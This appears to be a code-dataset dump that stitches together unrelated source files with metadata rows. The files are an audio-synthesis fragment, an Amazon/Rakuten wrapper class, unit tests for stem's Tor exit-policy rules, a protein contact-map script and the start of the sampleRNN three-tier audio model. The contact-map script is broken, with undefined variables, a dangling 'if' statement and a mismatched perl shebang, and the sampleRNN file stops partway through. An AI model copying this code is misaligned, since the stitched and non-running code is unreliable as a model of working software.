adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(2./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*3, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
# abre todos os gritoFala*
# passa por um passa bandas que soh passa uns medios
# salva como tv_gritoFala*
#
#c = n.zeros(len(coefs))
#c[1000:10000] = n.exp(1j*n.random.uniform(0, 2*n.pi, 9000))
#
## real par, imaginaria impar
#c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
# n.imag(c[1:Lambda/2])[::-1]
#
#resp_imp= n.fft.ifft(c)
#resp_imp_= n.real(resp_imp)
#import os
#
#ll=os.listdir(".")
#ll=[lll for lll in ll if "gritoFala" in lll]
#for i in ll:
# print i
# foo=n.convolve(w.read("%s"%(i,))[1],resp_imp)
# w.write('tv_%s'%(i,), f_a, N(foo))
# print i
#
|
unlicense
| 4,547,374,845,288,080,000
| 45.390826
| 216
| 0.425859
| false
| 1.993063
| false
| false
| false
|
AkihikoITOH/capybara
|
capybara/capybara.py
|
1
|
1091
|
#!/bin/python
# -*- coding: utf-8 -*-
import os
from amazon_wrapper import AmazonWrapper
from rakuten_wrapper import RakutenWrapper
class Capybara:
def __init__(self, config_dir=None, tokens_dir=None):
self.wrappers = {}
self.wrappers['amazon'] = AmazonWrapper()
self.wrappers['rakuten'] = RakutenWrapper()
for service, wrapper in self.wrappers.items():
config_filename = './%s_config.json' % service
tokens_filename = './%s_tokens.tsv' % service
config_path = os.path.normpath(os.path.join(os.getcwd(), config_dir, config_filename))
tokens_path = os.path.normpath(os.path.join(os.getcwd(), tokens_dir, tokens_filename))
wrapper.setup(config_path, tokens_path)
def get(self, service=None, item=None):
return self.wrappers[service].access_wrapper({'item': item})
def isAvailable(self, service=None):
if service is None:
return False
try:
if self.wrappers[service]:
return True
except:
return False
|
mit
| -303,462,010,463,526,900
| 33.09375
| 98
| 0.613199
| false
| 3.855124
| true
| false
| false
|
eoinof/stem
|
test/unit/exit_policy/rule.py
|
1
|
10901
|
"""
Unit tests for the stem.exit_policy.ExitPolicyRule class.
"""
import unittest
from stem.exit_policy import AddressType, ExitPolicyRule
class TestExitPolicyRule(unittest.TestCase):
def test_accept_or_reject(self):
self.assertTrue(ExitPolicyRule("accept *:*").is_accept)
self.assertFalse(ExitPolicyRule("reject *:*").is_accept)
invalid_inputs = (
"accept",
"reject",
"accept *:*",
"accept\t*:*",
"accept\n*:*",
"acceptt *:*",
"rejectt *:*",
"blarg *:*",
" *:*",
"*:*",
"",
)
for rule_arg in invalid_inputs:
self.assertRaises(ValueError, ExitPolicyRule, rule_arg)
def test_str_unchanged(self):
# provides a series of test inputs where the str() representation should
# match the input rule
test_inputs = (
"accept *:*",
"reject *:*",
"accept *:80",
"accept *:80-443",
"accept 127.0.0.1:80",
"accept 87.0.0.1/24:80",
"accept 156.5.38.3/255.255.0.255:80",
"accept [FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF]:80",
"accept [FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF]/32:80",
)
for rule_arg in test_inputs:
rule = ExitPolicyRule(rule_arg)
self.assertEquals(rule_arg, rule.rule)
self.assertEquals(rule_arg, str(rule))
def test_str_changed(self):
# some instances where our rule is valid but won't match our str() representation
test_inputs = {
"accept 10.0.0.1/32:80": "accept 10.0.0.1:80",
"accept 192.168.0.1/255.255.255.0:80": "accept 192.168.0.1/24:80",
"accept [::]/32:*": "accept [0000:0000:0000:0000:0000:0000:0000:0000]/32:*",
"accept [::]/128:*": "accept [0000:0000:0000:0000:0000:0000:0000:0000]:*",
}
for rule_arg, expected_str in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
self.assertEquals(rule_arg, rule.rule)
self.assertEquals(expected_str, str(rule))
def test_valid_wildcard(self):
test_inputs = {
"reject *:*": (True, True),
"reject *:80": (True, False),
"accept 192.168.0.1:*": (False, True),
"accept 192.168.0.1:80": (False, False),
"reject 127.0.0.1/0:*": (False, True),
"reject 127.0.0.1/16:*": (False, True),
"reject 127.0.0.1/32:*": (False, True),
"reject [0000:0000:0000:0000:0000:0000:0000:0000]/0:80": (False, False),
"reject [0000:0000:0000:0000:0000:0000:0000:0000]/64:80": (False, False),
"reject [0000:0000:0000:0000:0000:0000:0000:0000]/128:80": (False, False),
"accept 192.168.0.1:0-65535": (False, True),
"accept 192.168.0.1:1-65535": (False, True),
"accept 192.168.0.1:2-65535": (False, False),
"accept 192.168.0.1:1-65534": (False, False),
}
for rule_arg, attr in test_inputs.items():
is_address_wildcard, is_port_wildcard = attr
rule = ExitPolicyRule(rule_arg)
self.assertEquals(is_address_wildcard, rule.is_address_wildcard())
self.assertEquals(is_port_wildcard, rule.is_port_wildcard())
def test_invalid_wildcard(self):
test_inputs = (
"reject */16:*",
"reject 127.0.0.1/*:*",
"reject *:0-*",
"reject *:*-15",
)
for rule_arg in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, rule_arg)
def test_wildcard_attributes(self):
rule = ExitPolicyRule("reject *:*")
self.assertEquals(AddressType.WILDCARD, rule.address_type)
self.assertEquals(None, rule.address)
self.assertEquals(None, rule.mask)
self.assertEquals(None, rule.masked_bits)
self.assertEquals(1, rule.min_port)
self.assertEquals(65535, rule.max_port)
def test_valid_ipv4_addresses(self):
test_inputs = {
"0.0.0.0": ("0.0.0.0", "255.255.255.255", 32),
"127.0.0.1/32": ("127.0.0.1", "255.255.255.255", 32),
"192.168.0.50/24": ("192.168.0.50", "255.255.255.0", 24),
"255.255.255.255/0": ("255.255.255.255", "0.0.0.0", 0),
}
for rule_addr, attr in test_inputs.items():
address, mask, masked_bits = attr
rule = ExitPolicyRule("accept %s:*" % rule_addr)
self.assertEquals(AddressType.IPv4, rule.address_type)
self.assertEquals(address, rule.address)
self.assertEquals(mask, rule.mask)
self.assertEquals(masked_bits, rule.masked_bits)
def test_invalid_ipv4_addresses(self):
test_inputs = (
"256.0.0.0",
"-1.0.0.0",
"0.0.0",
"0.0.0.",
"0.0.0.a",
"127.0.0.1/-1",
"127.0.0.1/33",
)
for rule_addr in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, "accept %s:*" % rule_addr)
def test_valid_ipv6_addresses(self):
test_inputs = {
"[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]":
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329",
"FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF", 128),
"[FE80::0202:b3ff:fe1e:8329]":
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329",
"FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF", 128),
"[0000:0000:0000:0000:0000:0000:0000:0000]/0":
("0000:0000:0000:0000:0000:0000:0000:0000",
"0000:0000:0000:0000:0000:0000:0000:0000", 0),
"[::]":
("0000:0000:0000:0000:0000:0000:0000:0000",
"FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF", 128),
}
for rule_addr, attr in test_inputs.items():
address, mask, masked_bits = attr
rule = ExitPolicyRule("accept %s:*" % rule_addr)
self.assertEquals(AddressType.IPv6, rule.address_type)
self.assertEquals(address, rule.address)
self.assertEquals(mask, rule.mask)
self.assertEquals(masked_bits, rule.masked_bits)
def test_invalid_ipv6_addresses(self):
test_inputs = (
"fe80::0202:b3ff:fe1e:8329",
"[fe80::0202:b3ff:fe1e:8329",
"fe80::0202:b3ff:fe1e:8329]",
"[fe80::0202:b3ff:fe1e:832g]",
"[fe80:::b3ff:fe1e:8329]",
"[fe80::b3ff::fe1e:8329]",
"[fe80::0202:b3ff:fe1e:8329]/-1",
"[fe80::0202:b3ff:fe1e:8329]/129",
)
for rule_addr in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, "accept %s:*" % rule_addr)
def test_valid_ports(self):
test_inputs = {
"0": (0, 0),
"1": (1, 1),
"80": (80, 80),
"80-443": (80, 443),
}
for rule_port, attr in test_inputs.items():
min_port, max_port = attr
rule = ExitPolicyRule("accept 127.0.0.1:%s" % rule_port)
self.assertEquals(min_port, rule.min_port)
self.assertEquals(max_port, rule.max_port)
def test_invalid_ports(self):
test_inputs = (
"65536",
"a",
"5-3",
"5-",
"-3",
)
for rule_port in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, "accept 127.0.0.1:%s" % rule_port)
def test_is_match_wildcard(self):
test_inputs = {
"reject *:*": {
("192.168.0.1", 80): True,
("0.0.0.0", 80): True,
("255.255.255.255", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): True,
("[FE80:0000:0000:0000:0202:B3FF:FE1E:8329]", 80): True,
("192.168.0.1", None): True,
(None, 80): True,
(None, None): True,
},
"reject 255.255.255.255/0:*": {
("192.168.0.1", 80): True,
("0.0.0.0", 80): True,
("255.255.255.255", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): False,
("[FE80:0000:0000:0000:0202:B3FF:FE1E:8329]", 80): False,
("192.168.0.1", None): True,
(None, 80): False,
(None, None): False,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
# port zero is special in that exit policies can include it, but it's not
# something that we can match against
rule = ExitPolicyRule("reject *:*")
self.assertRaises(ValueError, rule.is_match, "127.0.0.1", 0)
def test_is_match_ipv4(self):
test_inputs = {
"reject 192.168.0.50:*": {
("192.168.0.50", 80): True,
("192.168.0.51", 80): False,
("192.168.0.49", 80): False,
(None, 80): False,
("192.168.0.50", None): True,
},
"reject 0.0.0.0/24:*": {
("0.0.0.0", 80): True,
("0.0.0.1", 80): True,
("0.0.0.255", 80): True,
("0.0.1.0", 80): False,
("0.1.0.0", 80): False,
("1.0.0.0", 80): False,
(None, 80): False,
("0.0.0.0", None): True,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
def test_is_match_ipv6(self):
test_inputs = {
"reject [FE80:0000:0000:0000:0202:B3FF:FE1E:8329]:*": {
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): True,
("fe80:0000:0000:0000:0202:b3ff:fe1e:8329", 80): True,
("[FE80:0000:0000:0000:0202:B3FF:FE1E:8329]", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8330", 80): False,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8328", 80): False,
(None, 80): False,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", None): True,
},
"reject [FE80:0000:0000:0000:0202:B3FF:FE1E:8329]/112:*": {
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:0000", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:FFFF", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1F:8329", 80): False,
("FE81:0000:0000:0000:0202:B3FF:FE1E:8329", 80): False,
(None, 80): False,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", None): True,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
def test_is_match_port(self):
test_inputs = {
"reject *:80": {
("192.168.0.50", 80): True,
("192.168.0.50", 81): False,
("192.168.0.50", 79): False,
(None, 80): True,
("192.168.0.50", None): False,
},
"reject *:80-85": {
("192.168.0.50", 79): False,
("192.168.0.50", 80): True,
("192.168.0.50", 83): True,
("192.168.0.50", 85): True,
("192.168.0.50", 86): False,
(None, 83): True,
("192.168.0.50", None): False,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
|
lgpl-3.0
| 8,623,108,772,148,325,000
| 32.336391
| 86
| 0.566278
| false
| 2.887682
| true
| false
| false
|
mskwark/PconsC3
|
extra/arne/MSA/find-intradom.py
|
1
|
1381
|
#!/usr/bin/env perl
# Find all contacts beween domains..
import sys, os, re, string
import argparse
from os.path import expanduser
home = expanduser("~")
sys.path.append(home + '/bioinfo-toolbox/parsing')
sys.path.append(home + '/git/bioinfo-toolbox/parsing')
import parse_contacts
import numpy as np
import matplotlib
matplotlib.use('Agg')
sep=5
contacts = parse_contacts.parse(open(c_filename, 'r'), sep)
contacts_np = parse_contacts.get_numpy_cmap(contacts)
contacts_np = contacts_np[start:end,start:end]
for i in range(len(contacts)):
score = contacts[i][0]
c_x = contacts[i][1] - 1
c_y = contacts[i][2] - 1
# only look at contacts within given range
# default: take full sequence range into account
if c_x < start or c_x >= end:
continue
if c_y < start or c_y >= end:
continue
if c_y-c_x < start or c_y >= end:
continue
if c_x < domain
pos_diff = abs(c_x - c_y)
too_close = pos_diff < 5
if __name__ == "__main__":
p = argparse.ArgumentParser(description='Plot protein residue contact maps.')
p.add_argument('-t', '--threshold', default=-1, type=float)
p.add_argument('--start', default=0, type=int)
p.add_argument('--end', default=-1, type=int)
p.add_argument('--sep', default=5, type=int)
p.add_argument('--domain', default=-1, type=int)
|
gpl-2.0
| -7,908,435,588,187,494,000
| 26.078431
| 81
| 0.631427
| false
| 3.204176
| false
| false
| false
|
soroushmehr/sampleRNN_ICLR2017
|
models/three_tier/three_tier.py
|
1
|
35718
|
"""
RNN Audio Generation Model
Three-tier model, Quantized input
For more info:
$ python three_tier.py -h
How-to-run example:
sampleRNN$ pwd
/u/mehris/sampleRNN
sampleRNN$ \
THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32 python -u \
models/three_tier/three_tier.py --exp AXIS1 --seq_len 512 --big_frame_size 8 \
--frame_size 2 --weight_norm True --emb_size 64 --skip_conn False --dim 32 \
--n_rnn 2 --rnn_type LSTM --learn_h0 False --q_levels 16 --q_type linear \
--batch_size 128 --which_set MUSIC
To resume add ` --resume` to the END of the EXACTLY above line. You can run the
resume code as many time as possible, depending on the TRAIN_MODE.
(folder name, file name, flags, their order, and the values are important)
"""
from time import time
from datetime import datetime
print "Experiment started at:", datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M')
exp_start = time()
import os, sys, glob
sys.path.insert(1, os.getcwd())
import argparse
import itertools
import numpy
numpy.random.seed(123)
np = numpy
import random
random.seed(123)
import theano
import theano.tensor as T
import theano.ifelse
import lasagne
import scipy.io.wavfile
import lib
LEARNING_RATE = 0.001
### Parsing passed args/hyperparameters ###
def get_args():
def t_or_f(arg):
ua = str(arg).upper()
if 'TRUE'.startswith(ua):
return True
elif 'FALSE'.startswith(ua):
return False
else:
raise ValueError('Arg is neither `True` nor `False`')
def check_non_negative(value):
ivalue = int(value)
if ivalue < 0:
raise argparse.ArgumentTypeError("%s is not non-negative!" % value)
return ivalue
def check_positive(value):
ivalue = int(value)
if ivalue < 1:
raise argparse.ArgumentTypeError("%s is not positive!" % value)
return ivalue
def check_unit_interval(value):
fvalue = float(value)
if fvalue < 0 or fvalue > 1:
raise argparse.ArgumentTypeError("%s is not in [0, 1] interval!" % value)
return fvalue
# No default value here. Indicate every single arguement.
parser = argparse.ArgumentParser(
description='three_tier.py\nNo default value! Indicate every argument.')
# TODO: Fix the descriptions
# Hyperparameter arguements:
parser.add_argument('--exp', help='Experiment name',
type=str, required=False, default='_')
parser.add_argument('--seq_len', help='How many samples to include in each\
Truncated BPTT pass', type=check_positive, required=True)
parser.add_argument('--big_frame_size', help='How many samples per big frame',\
type=check_positive, required=True)
parser.add_argument('--frame_size', help='How many samples per frame',\
type=check_positive, required=True)
parser.add_argument('--weight_norm', help='Adding learnable weight normalization\
to all the linear layers (except for the embedding layer)',\
type=t_or_f, required=True)
parser.add_argument('--emb_size', help='Size of embedding layer (> 0)',
type=check_positive, required=True) # different than two_tier
parser.add_argument('--skip_conn', help='Add skip connections to RNN',
type=t_or_f, required=True)
parser.add_argument('--dim', help='Dimension of RNN and MLPs',\
type=check_positive, required=True)
parser.add_argument('--n_rnn', help='Number of layers in the stacked RNN',
type=check_positive, choices=xrange(1,6), required=True)
parser.add_argument('--rnn_type', help='GRU or LSTM', choices=['LSTM', 'GRU'],\
required=True)
parser.add_argument('--learn_h0', help='Whether to learn the initial state of RNN',\
type=t_or_f, required=True)
parser.add_argument('--q_levels', help='Number of bins for quantization of\
audio samples. Should be 256 for mu-law.',\
type=check_positive, required=True)
parser.add_argument('--q_type', help='Quantization in linear-scale, a-law-companding,\
or mu-law compandig. With mu-/a-law quantization level shoud be set as 256',\
choices=['linear', 'a-law', 'mu-law'], required=True)
parser.add_argument('--which_set', help='ONOM, BLIZZ, MUSIC, or HUCK',
choices=['ONOM', 'BLIZZ', 'MUSIC', 'HUCK'], required=True)
parser.add_argument('--batch_size', help='size of mini-batch',
type=check_positive, choices=[64, 128, 256], required=True)
parser.add_argument('--debug', help='Debug mode', required=False, default=False, action='store_true')
parser.add_argument('--resume', help='Resume the same model from the last\
checkpoint. Order of params are important. [for now]',\
required=False, default=False, action='store_true')
args = parser.parse_args()
# NEW
# Create tag for this experiment based on passed args
tag = reduce(lambda a, b: a+b, sys.argv).replace('--resume', '').replace('/', '-').replace('--', '-').replace('True', 'T').replace('False', 'F')
tag += '-lr'+str(LEARNING_RATE)
print "Created experiment tag for these args:"
print tag
return args, tag
args, tag = get_args()
SEQ_LEN = args.seq_len # How many samples to include in each truncated BPTT pass
#print "------------------previous SEQ_LEN:", SEQ_LEN
# TODO: test incremental training
#SEQ_LEN = 512 + 256
#print "---------------------------new SEQ_LEN:", SEQ_LEN
BIG_FRAME_SIZE = args.big_frame_size # how many samples per big frame
FRAME_SIZE = args.frame_size # How many samples per frame
OVERLAP = BIG_FRAME_SIZE
WEIGHT_NORM = args.weight_norm
EMB_SIZE = args.emb_size
SKIP_CONN = args.skip_conn
DIM = args.dim # Model dimensionality.
BIG_DIM = DIM # Dimensionality for the slowest level.
N_RNN = args.n_rnn # How many RNNs to stack in the frame-level model
N_BIG_RNN = N_RNN # how many RNNs to stack in the big-frame-level model
RNN_TYPE = args.rnn_type
H0_MULT = 2 if RNN_TYPE == 'LSTM' else 1
LEARN_H0 = args.learn_h0
Q_LEVELS = args.q_levels # How many levels to use when discretizing samples. e.g. 256 = 8-bit scalar quantization
Q_TYPE = args.q_type # log- or linear-scale
WHICH_SET = args.which_set
BATCH_SIZE = args.batch_size
RESUME = args.resume
assert SEQ_LEN % BIG_FRAME_SIZE == 0,\
'seq_len should be divisible by big_frame_size'
assert BIG_FRAME_SIZE % FRAME_SIZE == 0,\
'big_frame_size should be divisible by frame_size'
N_FRAMES = SEQ_LEN / FRAME_SIZE # Number of frames in each truncated BPTT pass
if Q_TYPE == 'mu-law' and Q_LEVELS != 256:
raise ValueError('For mu-law Quantization levels should be exactly 256!')
# Fixed hyperparams
GRAD_CLIP = 1 # Elementwise grad clip threshold
BITRATE = 16000
# Other constants
#TRAIN_MODE = 'iters' # To use PRINT_ITERS and STOP_ITERS
TRAIN_MODE = 'time' # To use PRINT_TIME and STOP_TIME
#TRAIN_MODE = 'time-iters'
# To use PRINT_TIME for validation,
# and (STOP_ITERS, STOP_TIME), whichever happened first, for stopping exp.
#TRAIN_MODE = 'iters-time'
# To use PRINT_ITERS for validation,
# and (STOP_ITERS, STOP_TIME), whichever happened first, for stopping exp.
PRINT_ITERS = 10000 # Print cost, generate samples, save model checkpoint every N iterations.
STOP_ITERS = 100000 # Stop after this many iterations
PRINT_TIME = 90*60 # Print cost, generate samples, save model checkpoint every N seconds.
STOP_TIME = 60*60*24*3 # Stop after this many seconds of actual training (not including time req'd to generate samples etc.)
N_SEQS = 20 # Number of samples to generate every time monitoring.
RESULTS_DIR = 'results_3t'
FOLDER_PREFIX = os.path.join(RESULTS_DIR, tag)
Q_ZERO = numpy.int32(Q_LEVELS//2) # Discrete value correponding to zero amplitude
epoch_str = 'epoch'
iter_str = 'iter'
lowest_valid_str = 'lowest valid cost'
corresp_test_str = 'correponding test cost'
train_nll_str, valid_nll_str, test_nll_str = \
'train NLL (bits)', 'valid NLL (bits)', 'test NLL (bits)'
if args.debug:
import warnings
warnings.warn('----------RUNNING IN DEBUG MODE----------')
TRAIN_MODE = 'time'
PRINT_TIME = 100
STOP_TIME = 3000
STOP_ITERS = 1000
### Create directories ###
# FOLDER_PREFIX: root, contains:
# log.txt, __note.txt, train_log.pkl, train_log.png [, model_settings.txt]
# FOLDER_PREFIX/params: saves all checkpoint params as pkl
# FOLDER_PREFIX/samples: keeps all checkpoint samples as wav
# FOLDER_PREFIX/best: keeps the best parameters, samples, ...
if not os.path.exists(FOLDER_PREFIX):
os.makedirs(FOLDER_PREFIX)
PARAMS_PATH = os.path.join(FOLDER_PREFIX, 'params')
if not os.path.exists(PARAMS_PATH):
os.makedirs(PARAMS_PATH)
SAMPLES_PATH = os.path.join(FOLDER_PREFIX, 'samples')
if not os.path.exists(SAMPLES_PATH):
os.makedirs(SAMPLES_PATH)
BEST_PATH = os.path.join(FOLDER_PREFIX, 'best')
if not os.path.exists(BEST_PATH):
os.makedirs(BEST_PATH)
lib.print_model_settings(locals(), path=FOLDER_PREFIX, sys_arg=True)
### Import the data_feeder ###
# Handling WHICH_SET
if WHICH_SET == 'ONOM':
from datasets.dataset import onom_train_feed_epoch as train_feeder
from datasets.dataset import onom_valid_feed_epoch as valid_feeder
from datasets.dataset import onom_test_feed_epoch as test_feeder
elif WHICH_SET == 'BLIZZ':
from datasets.dataset import blizz_train_feed_epoch as train_feeder
from datasets.dataset import blizz_valid_feed_epoch as valid_feeder
from datasets.dataset import blizz_test_feed_epoch as test_feeder
elif WHICH_SET == 'MUSIC':
from datasets.dataset import music_train_feed_epoch as train_feeder
from datasets.dataset import music_valid_feed_epoch as valid_feeder
from datasets.dataset import music_test_feed_epoch as test_feeder
elif WHICH_SET == 'HUCK':
from datasets.dataset import huck_train_feed_epoch as train_feeder
from datasets.dataset import huck_valid_feed_epoch as valid_feeder
from datasets.dataset import huck_test_feed_epoch as test_feeder
def load_data(data_feeder):
"""
Helper function to deal with interface of different datasets.
`data_feeder` should be `train_feeder`, `valid_feeder`, or `test_feeder`.
"""
return data_feeder(BATCH_SIZE,
SEQ_LEN,
OVERLAP,
Q_LEVELS,
Q_ZERO,
Q_TYPE)
### Creating computation graph ###
def big_frame_level_rnn(input_sequences, h0, reset):
"""
input_sequences.shape: (batch size, n big frames * BIG_FRAME_SIZE)
h0.shape: (batch size, N_BIG_RNN, BIG_DIM)
reset.shape: ()
output[0].shape: (batch size, n frames, DIM)
output[1].shape: same as h0.shape
output[2].shape: (batch size, seq len, Q_LEVELS)
"""
frames = input_sequences.reshape((
input_sequences.shape[0],
input_sequences.shape[1] // BIG_FRAME_SIZE,
BIG_FRAME_SIZE
))
# Rescale frames from ints in [0, Q_LEVELS) to floats in [-2, 2]
# (a reasonable range to pass as inputs to the RNN)
frames = (frames.astype('float32') / lib.floatX(Q_LEVELS/2)) - lib.floatX(1)
frames *= lib.floatX(2)
# Initial state of RNNs
learned_h0 = lib.param(
'BigFrameLevel.h0',
numpy.zeros((N_BIG_RNN, H0_MULT*BIG_DIM), dtype=theano.config.floatX)
)
# Handling LEARN_H0
learned_h0.param = LEARN_H0
learned_h0 = T.alloc(learned_h0, h0.shape[0], N_BIG_RNN, H0_MULT*BIG_DIM)
learned_h0 = T.unbroadcast(learned_h0, 0, 1, 2)
h0 = theano.ifelse.ifelse(reset, learned_h0, h0)
# Handling RNN_TYPE
# Handling SKIP_CONN
if RNN_TYPE == 'GRU':
rnns_out, last_hidden = lib.ops.stackedGRU('BigFrameLevel.GRU',
N_BIG_RNN,
BIG_FRAME_SIZE,
BIG_DIM,
frames,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
elif RNN_TYPE == 'LSTM':
rnns_out, last_hidden = lib.ops.stackedLSTM('BigFrameLevel.LSTM',
N_BIG_RNN,
BIG_FRAME_SIZE,
BIG_DIM,
frames,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
output = lib.ops.Linear(
'BigFrameLevel.Output',
BIG_DIM,
DIM * BIG_FRAME_SIZE / FRAME_SIZE,
rnns_out,
initialization='he',
weightnorm=WEIGHT_NORM
)
output = output.reshape((output.shape[0], output.shape[1] * BIG_FRAME_SIZE / FRAME_SIZE, DIM))
independent_preds = lib.ops.Linear(
'BigFrameLevel.IndependentPreds',
BIG_DIM,
Q_LEVELS * BIG_FRAME_SIZE,
rnns_out,
initialization='he',
weightnorm=WEIGHT_NORM
)
independent_preds = independent_preds.reshape((independent_preds.shape[0], independent_preds.shape[1] * BIG_FRAME_SIZE, Q_LEVELS))
return (output, last_hidden, independent_preds)
def frame_level_rnn(input_sequences, other_input, h0, reset):
"""
input_sequences.shape: (batch size, n frames * FRAME_SIZE)
other_input.shape: (batch size, n frames, DIM)
h0.shape: (batch size, N_RNN, DIM)
reset.shape: ()
output.shape: (batch size, n frames * FRAME_SIZE, DIM)
"""
frames = input_sequences.reshape((
input_sequences.shape[0],
input_sequences.shape[1] // FRAME_SIZE,
FRAME_SIZE
))
# Rescale frames from ints in [0, Q_LEVELS) to floats in [-2, 2]
# (a reasonable range to pass as inputs to the RNN)
frames = (frames.astype('float32') / lib.floatX(Q_LEVELS/2)) - lib.floatX(1)
frames *= lib.floatX(2)
gru_input = lib.ops.Linear(
'FrameLevel.InputExpand',
FRAME_SIZE,
DIM,
frames,
initialization='he',
weightnorm=WEIGHT_NORM,
) + other_input
# Initial state of RNNs
learned_h0 = lib.param(
'FrameLevel.h0',
numpy.zeros((N_RNN, H0_MULT*DIM), dtype=theano.config.floatX)
)
# Handling LEARN_H0
learned_h0.param = LEARN_H0
learned_h0 = T.alloc(learned_h0, h0.shape[0], N_RNN, H0_MULT*DIM)
learned_h0 = T.unbroadcast(learned_h0, 0, 1, 2)
#learned_h0 = T.patternbroadcast(learned_h0, [False] * learned_h0.ndim)
h0 = theano.ifelse.ifelse(reset, learned_h0, h0)
# Handling RNN_TYPE
# Handling SKIP_CONN
if RNN_TYPE == 'GRU':
rnns_out, last_hidden = lib.ops.stackedGRU('FrameLevel.GRU',
N_RNN,
DIM,
DIM,
gru_input,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
elif RNN_TYPE == 'LSTM':
rnns_out, last_hidden = lib.ops.stackedLSTM('FrameLevel.LSTM',
N_RNN,
DIM,
DIM,
gru_input,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
output = lib.ops.Linear(
'FrameLevel.Output',
DIM,
FRAME_SIZE * DIM,
rnns_out,
initialization='he',
weightnorm=WEIGHT_NORM
)
output = output.reshape((output.shape[0], output.shape[1] * FRAME_SIZE, DIM))
return (output, last_hidden)
def sample_level_predictor(frame_level_outputs, prev_samples):
"""
frame_level_outputs.shape: (batch size, DIM)
prev_samples.shape: (batch size, FRAME_SIZE)
output.shape: (batch size, Q_LEVELS)
"""
# Handling EMB_SIZE
if EMB_SIZE == 0: # no support for one-hot in three_tier and one_tier.
prev_samples = lib.ops.T_one_hot(prev_samples, Q_LEVELS)
# (BATCH_SIZE*N_FRAMES*FRAME_SIZE, FRAME_SIZE, Q_LEVELS)
last_out_shape = Q_LEVELS
elif EMB_SIZE > 0:
prev_samples = lib.ops.Embedding(
'SampleLevel.Embedding',
Q_LEVELS,
EMB_SIZE,
prev_samples)
# (BATCH_SIZE*N_FRAMES*FRAME_SIZE, FRAME_SIZE, EMB_SIZE), f32
last_out_shape = EMB_SIZE
else:
raise ValueError('EMB_SIZE cannot be negative.')
prev_samples = prev_samples.reshape((-1, FRAME_SIZE * last_out_shape))
out = lib.ops.Linear(
'SampleLevel.L1_PrevSamples',
FRAME_SIZE * last_out_shape,
DIM,
prev_samples,
biases=False,
initialization='he',
weightnorm=WEIGHT_NORM
)
out += frame_level_outputs
